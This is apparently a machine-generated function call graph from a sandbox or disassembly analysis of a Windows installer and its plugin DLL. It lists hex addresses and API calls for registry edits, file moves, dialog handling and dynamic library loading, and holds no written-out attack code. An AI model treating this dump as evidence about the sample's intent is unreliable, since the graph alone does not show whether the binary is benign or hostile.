5157->5158 5159 40165f 5158->5159 5160 4061fb 2 API calls 5159->5160 5161 401665 5160->5161 5162 401959 5163 402aac 18 API calls 5162->5163 5164 401960 5163->5164 5165 402aac 18 API calls 5164->5165 5166 40196d 5165->5166 5167 402ace 18 API calls 5166->5167 5168 401984 lstrlenA 5167->5168 5169 401994 5168->5169 5170 4019d4 5169->5170 5174 405ef7 lstrcpynA 5169->5174 5172 4019c4 5172->5170 5173 4019c9 lstrlenA 5172->5173 5173->5170 5174->5172 5175 1000161a 5176 10001649 5175->5176 5177 10001a5d 18 API calls 5176->5177 5178 10001650 5177->5178 5179 10001663 5178->5179 5180 10001657 5178->5180 5181 1000168a 5179->5181 5182 1000166d 5179->5182 5183 10001266 2 API calls 5180->5183 5185 10001690 5181->5185 5186 100016b4 5181->5186 5184 100014e2 3 API calls 5182->5184 5190 10001661 5183->5190 5187 10001672 5184->5187 5188 10001559 3 API calls 5185->5188 5189 100014e2 3 API calls 5186->5189 5191 10001559 3 API calls 5187->5191 5192 10001695 5188->5192 5189->5190 5193 10001678 5191->5193 5194 10001266 2 API calls 5192->5194 5195 10001266 2 API calls 5193->5195 5196 1000169b GlobalFree 5194->5196 5197 1000167e GlobalFree 5195->5197 5196->5190 5198 100016af GlobalFree 5196->5198 5197->5190 5198->5190 5199 401b5d 5200 401b6a 5199->5200 5201 401bae 5199->5201 5204 401bf2 5200->5204 5209 401b81 5200->5209 5202 401bb2 5201->5202 5203 401bd7 GlobalAlloc 5201->5203 5217 4022dd 5202->5217 5220 405ef7 lstrcpynA 5202->5220 5206 405f19 18 API calls 5203->5206 5205 405f19 18 API calls 5204->5205 5204->5217 5207 4022d7 5205->5207 5206->5204 5212 4056ed MessageBoxIndirectA 5207->5212 5218 405ef7 lstrcpynA 5209->5218 5210 401bc4 GlobalFree 5210->5217 5212->5217 5213 401b90 5219 405ef7 lstrcpynA 5213->5219 5215 401b9f 5221 405ef7 lstrcpynA 5215->5221 5218->5213 5219->5215 5220->5210 5221->5217 5222 401f5d 5223 402ace 18 API calls 5222->5223 5224 401f64 5223->5224 5225 406290 5 API calls 5224->5225 5226 401f73 5225->5226 5227 401f8b GlobalAlloc 5226->5227 5228 401ff3 5226->5228 5227->5228 5229 401f9f 5227->5229 5230 406290 5 API calls 5229->5230 5231 401fa6 5230->5231 5232 406290 5 API calls 5231->5232 5233 401fb0 5232->5233 5233->5228 5237 405e55 wsprintfA 5233->5237 5235 401fe7 5238 405e55 wsprintfA 5235->5238 5237->5235 5238->5228 5239 401a5e 5240 402aac 18 API calls 5239->5240 5241 401a64 5240->5241 5242 402aac 18 API calls 5241->5242 5243 401a0e 5242->5243 5244 4026e1 5245 4026e7 5244->5245 5246 4026eb FindNextFileA 5245->5246 5247 4026fd 5245->5247 5246->5247 5248 40273c 5246->5248 5250 405ef7 lstrcpynA 5248->5250 5250->5247 5258 401563 5259 402906 5258->5259 5262 405e55 wsprintfA 5259->5262 5261 40290b 5262->5261 4422 40166a 4423 402ace 18 API calls 4422->4423 4424 401671 4423->4424 4425 402ace 18 API calls 4424->4425 4426 40167a 4425->4426 4427 402ace 18 API calls 4426->4427 4428 401683 MoveFileA 4427->4428 4429 401696 4428->4429 4430 40168f 4428->4430 4431 4061fb 2 API calls 4429->4431 4434 402238 4429->4434 4432 401423 25 API calls 4430->4432 4433 4016a5 4431->4433 4432->4434 4433->4434 4436 405db2 MoveFileExA 4433->4436 4437 405dd3 4436->4437 4438 405dc6 4436->4438 4437->4430 4440 405c40 lstrcpyA 4438->4440 4441 405c68 4440->4441 4442 405c8e GetShortPathNameA 4440->4442 4467 405b6a GetFileAttributesA CreateFileA 4441->4467 4444 405ca3 4442->4444 4445 405dad 4442->4445 4444->4445 4447 405cab wsprintfA 4444->4447 4445->4437 4446 405c72 CloseHandle GetShortPathNameA 4446->4445 4448 405c86 4446->4448 4449 405f19 18 API calls 4447->4449 4448->4442 4448->4445 4450 405cd3 4449->4450 4468 405b6a GetFileAttributesA CreateFileA 4450->4468 4452 405ce0 4452->4445 4453 405cef GetFileSize GlobalAlloc 4452->4453 4454 405d11 4453->4454 4455 405da6 CloseHandle 4453->4455 4456 405be2 ReadFile 4454->4456 4455->4445 4457 405d19 4456->4457 4457->4455 4469 405acf lstrlenA 4457->4469 4460 405d30 lstrcpyA 4462 405d52 4460->4462 4461 405d44 4463 405acf 4 API calls 4461->4463 4464 405d89 SetFilePointer 4462->4464 4463->4462 4465 405c11 WriteFile 4464->4465 4466 405d9f GlobalFree 4465->4466 4466->4455 4467->4446 4468->4452 4470 405b10 lstrlenA 4469->4470 4471 405b18 4470->4471 4472 405ae9 lstrcmpiA 4470->4472 4471->4460 4471->4461 4472->4471 4473 405b07 CharNextA 4472->4473 4473->4470 5263 40486b 5264 404897 5263->5264 5265 40487b 5263->5265 5266 4048ca 5264->5266 5267 40489d SHGetPathFromIDListA 5264->5267 5274 4056d1 GetDlgItemTextA 5265->5274 5269 4048b4 SendMessageA 5267->5269 5270 4048ad 5267->5270 5269->5266 5272 40140b 2 API calls 5270->5272 5271 404888 SendMessageA 5271->5264 5272->5269 5274->5271 5275 4019ed 5276 402ace 18 API calls 5275->5276 5277 4019f4 5276->5277 5278 402ace 18 API calls 5277->5278 5279 4019fd 5278->5279 5280 401a04 lstrcmpiA 5279->5280 5281 401a16 lstrcmpA 5279->5281 5282 401a0a 5280->5282 5281->5282 5283 40256e 5284 402ace 18 API calls 5283->5284 5285 402575 5284->5285 5288 405b6a GetFileAttributesA CreateFileA 5285->5288 5287 402581 5288->5287 4474 40156f 4475 401586 4474->4475 4476 40157f ShowWindow 4474->4476 4477 401594 ShowWindow 4475->4477 4478 40295e 4475->4478 4476->4475 4477->4478 5289 4041f0 lstrcpynA lstrlenA 4479 4022f2 4480 4022fa 4479->4480 4482 402300 4479->4482 4481 402ace 18 API calls 4480->4481 4481->4482 4483 402ace 18 API calls 4482->4483 4485 402310 4482->4485 4483->4485 4484 40231e 4487 402ace 18 API calls 4484->4487 4485->4484 4486 402ace 18 API calls 4485->4486 4486->4484 4488 402327 WritePrivateProfileStringA 4487->4488 5290 100015b3 5291 100014bb GlobalFree 5290->5291 5293 100015cb 5291->5293 5292 10001611 GlobalFree 5293->5292 5294 100015e6 5293->5294 5295 100015fd VirtualFree 5293->5295 5294->5292 5295->5292 5296 4014f4 SetForegroundWindow 5297 40295e 5296->5297 4586 4024f5 4587 402bd8 19 API calls 4586->4587 4588 4024ff 4587->4588 4589 402aac 18 API calls 4588->4589 4590 402508 4589->4590 4591 402523 RegEnumKeyA 4590->4591 4592 40252f RegEnumValueA 4590->4592 4594 402729 4590->4594 4593 402548 RegCloseKey 4591->4593 4592->4593 4592->4594 4593->4594 5298 401cf5 5299 402aac 18 API calls 5298->5299 5300 401cfc 5299->5300 5301 402aac 18 API calls 5300->5301 5302 401d08 GetDlgItem 5301->5302 5303 40258a 5302->5303 4603 402377 4604 4023a7 4603->4604 4605 40237c 4603->4605 4607 402ace 18 API calls 4604->4607 4606 402bd8 19 API calls 4605->4606 4608 402383 4606->4608 4609 4023ae 4607->4609 4610 40238d 4608->4610 4614 4023c4 4608->4614 4615 402b0e RegOpenKeyExA 4609->4615 4611 402ace 18 API calls 4610->4611 4612 402394 RegDeleteValueA RegCloseKey 4611->4612 4612->4614 4616 402ba2 4615->4616 4622 402b39 4615->4622 4616->4614 4617 402b5f RegEnumKeyA 4618 402b71 RegCloseKey 4617->4618 4617->4622 4626 406290 GetModuleHandleA 4618->4626 4620 402b96 RegCloseKey 4625 402b85 4620->4625 4621 402b0e 5 API calls 4621->4622 4622->4617 4622->4618 4622->4620 4622->4621 4624 402bb1 RegDeleteKeyA 4624->4625 4625->4616 4627 4062b6 GetProcAddress 4626->4627 4628 4062ac 4626->4628 4630 402b81 4627->4630 4632 406222 GetSystemDirectoryA 4628->4632 4630->4624 4630->4625 4631 4062b2 4631->4627 4631->4630 4633 406244 wsprintfA LoadLibraryExA 4632->4633 4633->4631 5318 1000103d 5319 1000101b 5 API calls 5318->5319 5320 10001056 5319->5320 5321 4018fd 5322 401934 5321->5322 5323 402ace 18 API calls 5322->5323 5324 401939 5323->5324 5325 405799 69 API calls 5324->5325 5326 401942 5325->5326 4666 401fff 4667 402011 4666->4667 4668 4020bf 4666->4668 4669 402ace 18 API calls 4667->4669 4671 401423 25 API calls 4668->4671 4670 402018 4669->4670 4672 402ace 18 API calls 4670->4672 4676 402238 4671->4676 4673 402021 4672->4673 4674 402036 LoadLibraryExA 4673->4674 4675 402029 GetModuleHandleA 4673->4675 4674->4668 4677 402046 GetProcAddress 4674->4677 4675->4674 4675->4677 4678 402092 4677->4678 4679 402055 4677->4679 4680 405110 25 API calls 4678->4680 4681 402074 4679->4681 4682 40205d 4679->4682 4684 402065 4680->4684 4687 100016bd 4681->4687 4683 401423 25 API calls 4682->4683 4683->4684 4684->4676 4685 4020b3 FreeLibrary 4684->4685 4685->4676 4688 100016ed 4687->4688 4729 10001a5d 4688->4729 4690 100016f4 4691 1000180a 4690->4691 4692 10001705 4690->4692 4693 1000170c 4690->4693 4691->4684 4778 100021b0 4692->4778 4761 100021fa 4693->4761 4698 10001770 4704 100017b2 4698->4704 4705 10001776 4698->4705 4699 10001752 4791 100023da 4699->4791 4700 10001722 4703 10001728 4700->4703 4710 10001733 4700->4710 4701 1000173b 4715 10001731 4701->4715 4788 10002aa3 4701->4788 4703->4715 4772 100027e8 4703->4772 4708 100023da 11 API calls 4704->4708 4706 10001559 3 API calls 4705->4706 4712 1000178c 4706->4712 4713 100017a4 4708->4713 4709 10001758 4802 10001559 4709->4802 4782 10002589 4710->4782 4718 100023da 11 API calls 4712->4718 4728 100017f9 4713->4728 4813 100023a0 4713->4813 4715->4698 4715->4699 4717 10001739 4717->4715 4718->4713 4721 10001803 GlobalFree 4721->4691 4725 100017e5 4725->4728 4817 100014e2 wsprintfA 4725->4817 4727 100017de FreeLibrary 4727->4725 4728->4691 4728->4721 4820 10001215 GlobalAlloc 4729->4820 4731 10001a81 4821 10001215 GlobalAlloc 4731->4821 4733 10001cbb GlobalFree GlobalFree GlobalFree 4734 10001cd8 4733->4734 4749 10001d22 4733->4749 4735 1000201a 4734->4735 4744 10001ced 4734->4744 4734->4749 4737 1000203c GetModuleHandleA 4735->4737 4735->4749 4736 10001b60 GlobalAlloc 4756 10001a8c 4736->4756 4740 10002062 4737->4740 4741 1000204d LoadLibraryA 4737->4741 4738 10001bab lstrcpyA 4743 10001bb5 lstrcpyA 4738->4743 4739 10001bc9 GlobalFree 4739->4756 4828 100015a4 GetProcAddress 4740->4828 4741->4740 4741->4749 4743->4756 4744->4749 4824 10001224 4744->4824 4745 100020b3 4746 100020c0 lstrlenA 4745->4746 4745->4749 4829 100015a4 GetProcAddress 4746->4829 4748 10001f7a 4748->4749 4753 10001fbe lstrcpyA 4748->4753 4749->4690 4750 10002074 4750->4745 4760 1000209d GetProcAddress 4750->4760 4753->4749 4754 10001c07 4754->4756 4822 10001534 GlobalSize GlobalAlloc 4754->4822 4755 10001e75 GlobalFree 4755->4756 4756->4733 4756->4736 4756->4738 4756->4739 4756->4743 4756->4748 4756->4749 4756->4754 4756->4755 4759 10001224 2 API calls 4756->4759 4827 10001215 GlobalAlloc 4756->4827 4757 100020d9 4757->4749 4759->4756 4760->4745 4763 10002212 4761->4763 4762 10001224 GlobalAlloc lstrcpynA 4762->4763 4763->4762 4765 10002349 GlobalFree 4763->4765 4766 100022b9 GlobalAlloc MultiByteToWideChar 4763->4766 4767 1000230a lstrlenA 4763->4767 4831 100012ad 4763->4831 4765->4763 4768 10001712 4765->4768 4769 10002303 4766->4769 4770 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4766->4770 4767->4765 4767->4769 4768->4700 4768->4701 4768->4715 4769->4765 4835 1000251d 4769->4835 4770->4765 4774 100027fa 4772->4774 4773 1000289f EnumWindows 4775 100028bd 4773->4775 4774->4773 4776 100029b9 4775->4776 4777 100029ae GetLastError 4775->4777 4776->4715 4777->4776 4779 100021c0 4778->4779 4780 1000170b 4778->4780 4779->4780 4781 100021d2 GlobalAlloc 4779->4781 4780->4693 4781->4779 4786 100025a5 4782->4786 4783 100025f6 GlobalAlloc 4787 10002618 4783->4787 4784 10002609 4785 1000260e GlobalSize 4784->4785 4784->4787 4785->4787 4786->4783 4786->4784 4787->4717 4789 10002aae 4788->4789 4790 10002aee GlobalFree 4789->4790 4838 10001215 GlobalAlloc 4791->4838 4793 1000243a lstrcpynA 4800 100023e6 4793->4800 4794 1000244b StringFromGUID2 WideCharToMultiByte 4794->4800 4795 1000246f WideCharToMultiByte 4795->4800 4796 100024b4 GlobalFree 4796->4800 4797 10002490 wsprintfA 4797->4800 4798 100024ee GlobalFree 4798->4709 4799 10001266 2 API calls 4799->4800 4800->4793 4800->4794 4800->4795 4800->4796 4800->4797 4800->4798 4800->4799 4839 100012d1 4800->4839 4843 10001215 GlobalAlloc 4802->4843 4804 1000155f 4805 1000156c lstrcpyA 4804->4805 4807 10001586 4804->4807 4808 100015a0 4805->4808 4807->4808 4809 1000158b wsprintfA 4807->4809 4810 10001266 4808->4810 4809->4808 4811 100012a8 GlobalFree 4810->4811 4812 1000126f GlobalAlloc lstrcpynA 4810->4812 4811->4713 4812->4811 4814 100023ae 4813->4814 4816 100017c5 4813->4816 4815 100023c7 GlobalFree 4814->4815 4814->4816 4815->4814 4816->4725 4816->4727 4818 10001266 2 API calls 4817->4818 4819 10001503 4818->4819 4819->4728 4820->4731 4821->4756 4823 10001552 4822->4823 4823->4754 4830 10001215 GlobalAlloc 4824->4830 4826 10001233 lstrcpynA 4826->4749 4827->4756 4828->4750 4829->4757 4830->4826 4832 100012b4 4831->4832 4833 10001224 2 API calls 4832->4833 4834 100012cf 4833->4834 4834->4763 4836 10002581 4835->4836 4837 1000252b VirtualAlloc 4835->4837 4836->4769 4837->4836 4838->4800 4840 100012f9 4839->4840 4841 100012da 4839->4841 4840->4800 4841->4840 4842 100012e0 lstrcpyA 4841->4842 4842->4840 4843->4804 5334 401000 5335 401037 BeginPaint GetClientRect 5334->5335 5336 40100c DefWindowProcA 5334->5336 5338 4010f3 5335->5338 5339 401179 5336->5339 5340 401073 CreateBrushIndirect FillRect DeleteObject 5338->5340 5341 4010fc 5338->5341 5340->5338 5342 401102 CreateFontIndirectA 5341->5342 5343 401167 EndPaint 5341->5343 5342->5343 5344 401112 6 API calls 5342->5344 5343->5339 5344->5343 5345 401900 5346 402ace 18 API calls 5345->5346 5347 401907 5346->5347 5348 4056ed MessageBoxIndirectA 5347->5348 5349 401910 5348->5349 5350 401502 5351 40150a 5350->5351 5353 40151d 5350->5353 5352 402aac 18 API calls 5351->5352 5352->5353 3991 402483 4002 402bd8 3991->4002 3993 40248d 3994 402ace 18 API calls 3993->3994 3995 402496 3994->3995 3996 4024a0 RegQueryValueExA 3995->3996 3997 402729 3995->3997 3998 4024c0 3996->3998 3999 4024c6 RegCloseKey 3996->3999 3998->3999 4006 405e55 wsprintfA 3998->4006 3999->3997 4003 402ace 18 API calls 4002->4003 4004 402bf1 4003->4004 4005 402bff RegOpenKeyExA 4004->4005 4005->3993 4006->3999 5354 100029c3 5355 100029db 5354->5355 5356 10001534 2 API calls 5355->5356 5357 100029f6 5356->5357 4007 401c04 4029 402aac 4007->4029 4009 401c0b 4010 402aac 18 API calls 4009->4010 4011 401c18 4010->4011 4012 401c2d 4011->4012 4013 402ace 18 API calls 4011->4013 4014 401c3d 4012->4014 4015 402ace 18 API calls 4012->4015 4013->4012 4016 401c94 4014->4016 4017 401c48 4014->4017 4015->4014 4018 402ace 18 API calls 4016->4018 4019 402aac 18 API calls 4017->4019 4021 401c99 4018->4021 4020 401c4d 4019->4020 4022 402aac 18 API calls 4020->4022 4023 402ace 18 API calls 4021->4023 4024 401c59 4022->4024 4025 401ca2 FindWindowExA 4023->4025 4026 401c84 SendMessageA 4024->4026 4027 401c66 SendMessageTimeoutA 4024->4027 4028 401cc0 4025->4028 4026->4028 4027->4028 4030 405f19 18 API calls 4029->4030 4031 402ac1 4030->4031 4031->4009 5358 405084 5359 405094 5358->5359 5360 4050a8 5358->5360 5361 4050f1 5359->5361 5362 40509a 5359->5362 5363 4050b0 IsWindowVisible 5360->5363 5369 4050c7 5360->5369 5364 4050f6 CallWindowProcA 5361->5364 5365 404128 SendMessageA 5362->5365 5363->5361 5366 4050bd 5363->5366 5367 4050a4 5364->5367 5365->5367 5371 4049db SendMessageA 5366->5371 5369->5364 5376 404a5b 5369->5376 5372 404a3a SendMessageA 5371->5372 5373 4049fe GetMessagePos ScreenToClient SendMessageA 5371->5373 5375 404a32 5372->5375 5374 404a37 5373->5374 5373->5375 5374->5372 5375->5369 5385 405ef7 lstrcpynA 5376->5385 5378 404a6e 5386 405e55 wsprintfA 5378->5386 5380 404a78 5381 40140b 2 API calls 5380->5381 5382 404a81 5381->5382 5387 405ef7 lstrcpynA 5382->5387 5384 404a88 5384->5361 5385->5378 5386->5380 5387->5384 4042 403c09 4043 403c21 4042->4043 4044 403d5c 4042->4044 4043->4044 4045 403c2d 4043->4045 4046 403dad 4044->4046 4047 403d6d GetDlgItem GetDlgItem 4044->4047 4048 403c38 SetWindowPos 4045->4048 4049 403c4b 4045->4049 4051 403e07 4046->4051 4059 401389 2 API calls 4046->4059 4050 4040dc 19 API calls 4047->4050 4048->4049 4052 403c50 ShowWindow 4049->4052 4053 403c68 4049->4053 4054 403d97 SetClassLongA 4050->4054 4073 403d57 4051->4073 4112 404128 4051->4112 4052->4053 4056 403c70 DestroyWindow 4053->4056 4057 403c8a 4053->4057 4058 40140b 2 API calls 4054->4058 4111 404065 4056->4111 4060 403ca0 4057->4060 4061 403c8f SetWindowLongA 4057->4061 4058->4046 4062 403ddf 4059->4062 4065 403d49 4060->4065 4066 403cac GetDlgItem 4060->4066 4061->4073 4062->4051 4067 403de3 SendMessageA 4062->4067 4063 40140b 2 API calls 4069 403e19 4063->4069 4064 404067 DestroyWindow EndDialog 4064->4111 4131 404143 4065->4131 4070 403cdc 4066->4070 4071 403cbf SendMessageA IsWindowEnabled 4066->4071 4067->4073 4068 404096 ShowWindow 4068->4073 4069->4063 4069->4064 4069->4073 4074 405f19 18 API calls 4069->4074 4079 4040dc 19 API calls 4069->4079 4102 403fa7 DestroyWindow 4069->4102 4115 4040dc 4069->4115 4075 403ce9 4070->4075 4076 403d30 SendMessageA 4070->4076 4077 403cfc 4070->4077 4085 403ce1 4070->4085 4071->4070 4071->4073 4074->4069 4075->4076 4075->4085 4076->4065 4080 403d04 4077->4080 4081 403d19 4077->4081 4079->4069 4125 40140b 4080->4125 4084 40140b 2 API calls 4081->4084 4082 403d17 4082->4065 4086 403d20 4084->4086 4128 4040b5 4085->4128 4086->4065 4086->4085 4088 403e94 GetDlgItem 4089 403eb1 ShowWindow KiUserCallbackDispatcher 4088->4089 4090 403ea9 4088->4090 4118 4040fe KiUserCallbackDispatcher 4089->4118 4090->4089 4092 403edb EnableWindow 4095 403eef 4092->4095 4093 403ef4 GetSystemMenu EnableMenuItem SendMessageA 4094 403f24 SendMessageA 4093->4094 4093->4095 4094->4095 4095->4093 4119 404111 SendMessageA 4095->4119 4120 405ef7 lstrcpynA 4095->4120 4098 403f52 lstrlenA 4099 405f19 18 API calls 4098->4099 4100 403f63 SetWindowTextA 4099->4100 4121 401389 4100->4121 4103 403fc1 CreateDialogParamA 4102->4103 4102->4111 4104 403ff4 4103->4104 4103->4111 4105 4040dc 19 API calls 4104->4105 4106 403fff GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4105->4106 4107 401389 2 API calls 4106->4107 4108 404045 4107->4108 4108->4073 4109 40404d ShowWindow 4108->4109 4110 404128 SendMessageA 4109->4110 4110->4111 4111->4068 4111->4073 4113 404140 4112->4113 4114 404131 SendMessageA 4112->4114 4113->4069 4114->4113 4116 405f19 18 API calls 4115->4116 4117 4040e7 SetDlgItemTextA 4116->4117 4117->4088 4118->4092 4119->4095 4120->4098 4123 401390 4121->4123 4122 4013fe 4122->4069 4123->4122 4124 4013cb MulDiv SendMessageA 4123->4124 4124->4123 4126 401389 2 API calls 4125->4126 4127 401420 4126->4127 4127->4085 4129 4040c2 SendMessageA 4128->4129 4130 4040bc 4128->4130 4129->4082 4130->4129 4132 40415b GetWindowLongA 4131->4132 4142 4041e4 4131->4142 4133 40416c 4132->4133 4132->4142 4134 40417b GetSysColor 4133->4134 4135 40417e 4133->4135 4134->4135 4136 404184 SetTextColor 4135->4136 4137 40418e SetBkMode 4135->4137 4136->4137 4138 4041a6 GetSysColor 4137->4138 4139 4041ac 4137->4139 4138->4139 4140 4041b3 SetBkColor 4139->4140 4141 4041bd 4139->4141 4140->4141 4141->4142 4143 4041d0 DeleteObject 4141->4143 4144 4041d7 CreateBrushIndirect 4141->4144 4142->4073 4143->4144 4144->4142 4148 40270b 4149 402ace 18 API calls 4148->4149 4150 402712 FindFirstFileA 4149->4150 4151 402735 4150->4151 4152 402725 4150->4152 4153 40273c 4151->4153 4156 405e55 wsprintfA 4151->4156 4157 405ef7 lstrcpynA 4153->4157 4156->4153 4157->4152 5388 404a8d GetDlgItem GetDlgItem 5389 404adf 7 API calls 5388->5389 5395 404cf7 5388->5395 5390 404b82 DeleteObject 5389->5390 5391 404b75 SendMessageA 5389->5391 5392 404b8b 5390->5392 5391->5390 5393 404bc2 5392->5393 5394 405f19 18 API calls 5392->5394 5396 4040dc 19 API calls 5393->5396 5399 404ba4 SendMessageA SendMessageA 5394->5399 5398 404ddb 5395->5398 5405 4049db 5 API calls 5395->5405 5421 404d68 5395->5421 5402 404bd6 5396->5402 5397 404e87 5400 404e91 SendMessageA 5397->5400 5401 404e99 5397->5401 5398->5397 5407 404e34 SendMessageA 5398->5407 5431 404cea 5398->5431 5399->5392 5400->5401 5409 404eb2 5401->5409 5410 404eab ImageList_Destroy 5401->5410 5418 404ec2 5401->5418 5406 4040dc 19 API calls 5402->5406 5403 404143 8 API calls 5408 40507d 5403->5408 5404 404dcd SendMessageA 5404->5398 5405->5421 5422 404be4 5406->5422 5412 404e49 SendMessageA 5407->5412 5407->5431 5414 404ebb GlobalFree 5409->5414 5409->5418 5410->5409 5411 405031 5416 405043 ShowWindow GetDlgItem ShowWindow 5411->5416 5411->5431 5413 404e5c 5412->5413 5424 404e6d SendMessageA 5413->5424 5414->5418 5415 404cb8 GetWindowLongA SetWindowLongA 5417 404cd1 5415->5417 5416->5431 5419 404cd7 ShowWindow 5417->5419 5420 404cef 5417->5420 5418->5411 5430 404a5b 4 API calls 5418->5430 5435 404efd 5418->5435 5439 404111 SendMessageA 5419->5439 5440 404111 SendMessageA 5420->5440 5421->5398 5421->5404 5422->5415 5423 404c33 SendMessageA 5422->5423 5425 404cb2 5422->5425 5428 404c80 SendMessageA 5422->5428 5429 404c6f SendMessageA 5422->5429 5423->5422 5424->5397 5425->5415 5425->5417 5428->5422 5429->5422 5430->5435 5431->5403 5432 405007 InvalidateRect 5432->5411 5433 40501d 5432->5433 5441 404996 5433->5441 5434 404f2b SendMessageA 5438 404f41 5434->5438 5435->5434 5435->5438 5437 404fb5 SendMessageA SendMessageA 5437->5438 5438->5432 5438->5437 5439->5431 5440->5395 5444 4048d1 5441->5444 5443 4049ab 5443->5411 5445 4048e7 5444->5445 5446 405f19 18 API calls 5445->5446 5447 40494b 5446->5447 5448 405f19 18 API calls 5447->5448 5449 404956 5448->5449 5450 405f19 18 API calls 5449->5450 5451 40496c lstrlenA wsprintfA SetDlgItemTextA 5450->5451 5451->5443 4235 402590 4236 402595 4235->4236 4237 4025a9 4235->4237 4239 402aac 18 API calls 4236->4239 4238 402ace 18 API calls 4237->4238 4240 4025b0 lstrlenA 4238->4240 4241 40259e 4239->4241 4240->4241 4243 4025d2 4241->4243 4244 405c11 WriteFile 4241->4244 4245 405c2f 4244->4245 4245->4243 5459 401490 5460 405110 25 API calls 5459->5460 5461 401497 5460->5461 5462 402c13 5463 402c22 SetTimer 5462->5463 5464 402c3b 5462->5464 5463->5464 5465 402c89 5464->5465 5466 402c8f MulDiv 5464->5466 5467 402c49 wsprintfA SetWindowTextA SetDlgItemTextA 5466->5467 5467->5465 5469 401d95 GetDC 5470 402aac 18 API calls 5469->5470 5471 401da7 GetDeviceCaps MulDiv ReleaseDC 5470->5471 5472 402aac 18 API calls 5471->5472 5473 401dd8 5472->5473 5474 405f19 18 API calls 5473->5474 5475 401e15 CreateFontIndirectA 5474->5475 5476 40258a 5475->5476 5477 10001058 5479 10001074 5477->5479 5478 100010dc 5479->5478 5480 100014bb GlobalFree 5479->5480 5481 10001091 5479->5481 5480->5481 5482 100014bb GlobalFree 5481->5482 5483 100010a1 5482->5483 5484 100010b1 5483->5484 5485 100010a8 GlobalSize 5483->5485 5486 100010b5 GlobalAlloc 5484->5486 5488 100010c6 5484->5488 5485->5484 5487 100014e2 3 API calls 5486->5487 5487->5488 5489 100010d1 GlobalFree 5488->5489 5489->5478 5490 40451a 5491 404546 5490->5491 5492 404557 5490->5492 5551 4056d1 GetDlgItemTextA 5491->5551 5494 404563 GetDlgItem 5492->5494 5501 4045c2 5492->5501 5497 404577 5494->5497 5495 4046a6 5500 404850 5495->5500 5553 4056d1 GetDlgItemTextA 5495->5553 5496 404551 5498 406162 5 API calls 5496->5498 5499 40458b SetWindowTextA 5497->5499 5503 405a02 4 API calls 5497->5503 5498->5492 5504 4040dc 19 API calls 5499->5504 5507 404143 8 API calls 5500->5507 5501->5495 5501->5500 5505 405f19 18 API calls 5501->5505 5509 404581 5503->5509 5510 4045a7 5504->5510 5511 404636 SHBrowseForFolderA 5505->5511 5506 4046d6 5512 405a57 18 API calls 5506->5512 5508 404864 5507->5508 5509->5499 5516 405969 3 API calls 5509->5516 5513 4040dc 19 API calls 5510->5513 5511->5495 5514 40464e CoTaskMemFree 5511->5514 5515 4046dc 5512->5515 5517 4045b5 5513->5517 5518 405969 3 API calls 5514->5518 5554 405ef7 lstrcpynA 5515->5554 5516->5499 5552 404111 SendMessageA 5517->5552 5520 40465b 5518->5520 5523 404692 SetDlgItemTextA 5520->5523 5527 405f19 18 API calls 5520->5527 5522 4045bb 5525 406290 5 API calls 5522->5525 5523->5495 5524 4046f3 5526 406290 5 API calls 5524->5526 5525->5501 5533 4046fa 5526->5533 5528 40467a lstrcmpiA 5527->5528 5528->5523 5531 40468b lstrcatA 5528->5531 5529 404736 5555 405ef7 lstrcpynA 5529->5555 5531->5523 5532 40473d 5534 405a02 4 API calls 5532->5534 5533->5529 5537 4059b0 2 API calls 5533->5537 5539 40478e 5533->5539 5535 404743 GetDiskFreeSpaceA 5534->5535 5538 404767 MulDiv 5535->5538 5535->5539 5537->5533 5538->5539 5540 4047ff 5539->5540 5542 404996 21 API calls 5539->5542 5541 404822 5540->5541 5543 40140b 2 API calls 5540->5543 5556 4040fe KiUserCallbackDispatcher 5541->5556 5544 4047ec 5542->5544 5543->5541 5546 404801 SetDlgItemTextA 5544->5546 5547 4047f1 5544->5547 5546->5540 5549 4048d1 21 API calls 5547->5549 5548 40483e 5548->5500 5557 4044af 5548->5557 5549->5540 5551->5496 5552->5522 5553->5506 5554->5524 5555->5532 5556->5548 5558 4044c2 SendMessageA 5557->5558 5559 4044bd 5557->5559 5558->5500 5559->5558 5560 401d1a 5561 402aac 18 API calls 5560->5561 5562 401d28 SetWindowLongA 5561->5562 5563 40295e 5562->5563 4404 40159d 4405 402ace 18 API calls 4404->4405 4406 4015a4 SetFileAttributesA 4405->4406 4407 4015b6 4406->4407 5569 40149d 5570 4014ab PostQuitMessage 5569->5570 5571 4022dd 5569->5571 5570->5571 4408 401a1e 4409 402ace 18 API calls 4408->4409 4410 401a27 ExpandEnvironmentStringsA 4409->4410 4411 401a3b 4410->4411 4413 401a4e 4410->4413 4412 401a40 lstrcmpA 4411->4412 4411->4413 4412->4413 5572 40171f 5573 402ace 18 API calls 5572->5573 5574 401726 SearchPathA 5573->5574 5575 401741 5574->5575 5576 100010e0 5585 1000110e 5576->5585 5577 100011c4 GlobalFree 5578 100012ad 2 API calls 5578->5585 5579 100011c3 5579->5577 5580 100011ea GlobalFree 5580->5585 5581 10001266 2 API calls 5584 100011b1 GlobalFree 5581->5584 5582 10001155 GlobalAlloc 5582->5585 5583 100012d1 lstrcpyA 5583->5585 5584->5585 5585->5577 5585->5578 5585->5579 5585->5580 5585->5581 5585->5582 5585->5583 5585->5584 5586 10002162 5587 100021c0 5586->5587 5588 100021f6 5586->5588 5587->5588 5589 100021d2 GlobalAlloc 5587->5589 5589->5587 4414 401e25 4415 402aac 18 API calls 4414->4415 4416 401e2b 4415->4416 4417 402aac 18 API calls 4416->4417 4418 401e37 4417->4418 4419 401e43 ShowWindow 4418->4419 4420 401e4e EnableWindow 4418->4420 4421 40295e 4419->4421 4420->4421 5590 404225 5591 40423b 5590->5591 5598 404347 5590->5598 5595 4040dc 19 API calls 5591->5595 5592 4043b6 5593 4043c0 GetDlgItem 5592->5593 5594 40448a 5592->5594 5596 4043d6 5593->5596 5597 404448 5593->5597 5600 404143 8 API calls 5594->5600 5599 404291 5595->5599 5596->5597 5605 4043fc 6 API calls 5596->5605 5597->5594 5606 40445a 5597->5606 5598->5592 5598->5594 5602 40438b GetDlgItem SendMessageA 5598->5602 5601 4040dc 19 API calls 5599->5601 5603 404485 5600->5603 5604 40429e CheckDlgButton 5601->5604 5621 4040fe KiUserCallbackDispatcher 5602->5621 5619 4040fe KiUserCallbackDispatcher 5604->5619 5605->5597 5609 404460 SendMessageA 5606->5609 5610 404471 5606->5610 5609->5610 5610->5603 5613 404477 SendMessageA 5610->5613 5611 4043b1 5614 4044af SendMessageA 5611->5614 5612 4042bc GetDlgItem 5620 404111 SendMessageA 5612->5620 